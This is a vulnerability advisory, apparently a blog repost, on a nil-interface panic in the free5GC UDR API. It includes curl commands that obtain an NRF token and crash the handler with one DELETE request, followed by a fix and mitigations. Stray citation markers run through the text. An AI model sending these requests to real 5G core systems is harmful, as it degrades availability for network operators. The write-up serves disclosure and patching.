Listen to this Post
The vulnerability resides in the free5GC UDR (Unified Data Repository) `nudr-dr` API endpoint. Specifically, the handler for the `DELETE /subscription-data/{ueId}/{servingPlmnId}/ee-subscriptions/{subsId}/amf-subscriptions` route【0†L1-L2】. When a request is made with a `ueId` that does not exist in the UDR’s internal `UESubsCollection` store, the following flawed logic is executed.
The processor checks if the `ueId` exists using value, ok := udrSelf.UESubsCollection.Load(ueId)【0†L22-L23】. On a cache miss (ok == false), the code correctly sets a `404 USER_NOT_FOUND` problem details object【0†L23】. However, the critical error is that execution does not stop or return after setting the error【0†L3】【0†L24】. The code proceeds to the next line, which is a Go type assertion: UESubsData := value.(udr_context.UESubsData)【0†L25】.
Since `ueId` was not found, the `Load` function returns `nil` for the `value` interface. Performing a type assertion on a nil interface causes a runtime panic in Go with the message: interface conversion: interface {} is nil, not context.UESubsData【0†L26】. This panic is then caught by the Gin framework’s recovery mechanism, which converts it into an HTTP `500 Internal Server Error` response【0†L4】【0†L36】.
This is an authenticated vulnerability, requiring a valid OAuth2 access token for the `nudr-dr` scope, classifying it as a Privilege Required (Low) issue【0†L8-L9】. No prior EE-subscription state needs to exist, making exploitation trivial against a fresh UDR instance【0†L6】. The vulnerable code paths are located in `api_datarepository.go` and event_amf_subscription_info_document.go【0†L32-L35】. A proof-of-concept involves restarting UDR, obtaining a token from the NRF, and sending a single DELETE request with a non-existent ueId【0†L40-L56】.
Platform: free5GC UDR
Version: v4.2.1
Vulnerability: Nil Interface Panic
Severity: Medium (5.3)
date: 2026-03-22
Prediction: 2026-04-05
What Undercode Say:
The flaw is a classic example of improper error handling (CWE-754) followed by an incorrect type conversion on a nil interface (CWE-704)【0†L57】. The fix is a one-liner: inserting a `return` statement after setting the `404` error.
Validate the running UDR container version
docker ps --filter "name=udr" --format "table {{.Image}}\t{{.RunningFor}}"
Exploit: Obtain a valid OAuth2 token from the NRF
NEF_ID="eb9990de-4cd3-41b0-b5d9-c2102b088c57"
TOKEN=$(curl -sS -X POST 'http://10.100.200.3:8000/oauth2/token' \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode "grant_type=client_credentials" \
--data-urlencode "nfType=NEF" \
--data-urlencode "nfInstanceId=${NEF_ID}" \
--data-urlencode "targetNfType=UDR" \
--data-urlencode "scope=nudr-dr" \
| jq -r .access_token)
Exploit: Crash the UDR handler with a single request
curl -i -sS -X DELETE \
'http://10.100.200.11:8000/nudr-dr/v2/subscription-data/x/bad/ee-subscriptions/x/amf-subscriptions' \
-H "Authorization: Bearer ${TOKEN}"
Analytics: Check UDR logs for the panic
docker logs udr 2>&1 | grep -i "panic: interface conversion"
Exploit:
An attacker with a valid `nudr-dr` access token can trigger a denial-of-service (DoS) by sending a single HTTP `DELETE` request to the vulnerable endpoint with a non-existent ueId【0†L44】. The server will panic for each such request, logging a stack trace and returning a `500` error, which consumes more resources than a standard `404` response would【0†L58-L65】. This can be repeated to cause sustained performance degradation.
Protection from this CVE
Apply the upstream fix from free5gc/udr60【0†L68】. This commit introduces a `return` statement in the error handling path. If patching is not immediately possible, implement a Web Application Firewall (WAF) or API gateway rule to reject `DELETE` requests to the `/nudr-dr/v2/subscription-data//ee-subscriptions//amf-subscriptions` endpoint where the `ueId` path parameter does not conform to a known, valid pattern.
Impact
- Confidentiality: None. The service responds with an empty `500` error body【0†L64】.
- Integrity: None. The panic occurs before any state mutation takes place【0†L64】.
- Availability: Medium. A single request triggers a handler panic. While Gin recovers and the process remains running, each panic degrades performance and logs errors, enabling a low-volume, high-efficiency DoS attack【0†L63-L65】.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
